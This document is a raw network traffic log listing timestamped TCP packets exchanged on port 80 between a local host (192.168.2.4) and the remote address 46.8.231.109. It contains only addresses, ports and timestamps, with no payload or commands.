Oct 2, 2024 09:41:27.718714952 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.718714952 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.718715906 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.718715906 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.718715906 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.718715906 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.718723059 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.718770981 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.718847036 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.718878031 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.718909979 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.718940020 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.718971014 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.719002962 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.719033957 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.719043970 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.719043970 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.719043970 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.719043970 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.719043970 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.719043970 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.719064951 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.719095945 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.719127893 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.719161987 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.719192982 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.719198942 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.719198942 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.719198942 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.719224930 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.719290972 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.719304085 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.719326019 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.719337940 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.719364882 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.719408989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.719408989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.719408989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.719419003 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.719451904 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.719484091 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.719494104 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.719494104 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.719516993 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.719548941 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.719580889 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.719611883 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.719624043 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.719624043 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.719703913 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.719741106 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.719741106 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.719752073 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.719784975 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.719816923 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.719847918 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.719880104 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.719911098 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.719944954 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.719954014 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.719954014 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.719954014 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.719954014 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.719954014 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.719979048 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.720009089 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.720040083 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.720072031 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.720103025 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.720134974 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.720165968 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.720196962 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.720211029 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.720211029 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.720211029 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.720211029 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.720211029 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.720211029 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.720228910 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.720259905 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.720290899 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.720323086 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.720354080 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.720381021 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.720398903 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.720398903 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.720398903 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.720398903 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.720398903 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.720398903 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.720412016 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.720447063 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.720479012 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.720513105 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.720542908 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.720575094 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.720606089 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.720618963 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.720618963 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.720618963 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.720618963 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.720618963 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.720618963 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.720638037 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.720669031 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.720700026 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.720766068 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.720798016 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.720829964 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.720861912 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.720894098 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.720925093 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.720954895 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.720968008 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.720968008 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.720968008 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.720968008 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.720968008 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.720968008 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.720988035 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.721019983 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.721051931 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.721082926 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.721117020 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.721147060 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.721178055 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.721209049 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.721240997 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.721271992 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.721283913 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.721283913 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.721283913 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.721283913 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.721283913 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.721283913 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.721318960 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.721349955 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.721381903 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.721412897 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.721445084 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.721477032 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.721508026 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.721539974 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.721571922 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.721581936 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.721581936 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.721581936 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.721581936 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.721601963 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.721601963 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.721602917 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.721636057 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.721642017 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.721642017 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.721666098 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.721700907 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.721731901 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.721764088 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.721796036 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.721827984 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.721858978 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.721890926 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.721921921 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.721936941 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.721936941 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.721936941 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.721936941 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.721936941 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.721936941 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.721955061 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.721986055 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.722018003 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.722049952 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.722080946 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.722111940 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.722143888 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.722150087 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.722150087 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.722150087 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.722150087 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.722150087 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.722150087 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.722176075 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.722208977 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.722239971 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.722271919 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.722302914 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.722333908 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.722366095 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.722397089 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.722428083 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.722460032 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.722470045 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.722470045 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.722470045 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.722470045 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.722470045 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.722470045 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.722491980 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.722523928 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.722556114 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.722587109 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.722605944 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.722605944 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.722605944 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.722615004 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.722645998 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.722645998 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.722755909 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.728138924 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.728188038 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.728243113 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.728243113 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.728940010 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.728991032 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.729024887 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.729074955 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.729108095 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.729156971 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.729188919 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.729219913 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.729253054 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.729284048 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.729295015 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.729295015 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.729295015 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.729295015 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.729295969 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.729295969 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.729331970 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.729365110 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.729397058 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.729428053 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.729460001 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.729496002 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.729528904 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.729559898 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.729590893 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.729623079 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.729631901 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.729631901 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.729631901 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.729631901 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.729631901 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.729631901 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.729655027 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.729703903 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.729737043 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.729768038 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.729804039 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.729835987 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.729866982 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.729914904 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.729947090 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.729980946 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.729989052 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.729989052 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.729989052 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.729989052 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.729989052 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.729989052 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730014086 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730045080 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730076075 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730107069 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730139017 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730170965 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730218887 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730249882 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730282068 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730298996 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730314016 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730323076 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730323076 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730323076 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730323076 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730323076 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730323076 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730328083 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730350018 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730362892 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730377913 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730391979 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730406046 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730421066 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730432034 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730432034 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730432987 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730432987 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730432987 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730432987 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730437040 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730452061 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730465889 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730479002 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730494022 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730508089 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730513096 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730513096 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730514050 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730514050 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730514050 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730514050 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730523109 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730536938 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730551958 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730566978 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730581045 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730595112 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730604887 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730604887 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730604887 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730604887 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730604887 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730604887 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730618000 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730632067 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730645895 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730659962 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730674982 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730689049 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730705023 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730719090 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730720043 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730720043 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730720043 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730720043 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730720043 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730720997 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.730732918 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730747938 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730762005 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.730777025 CEST	80	49749	46.8.231.109	192.168.2.4
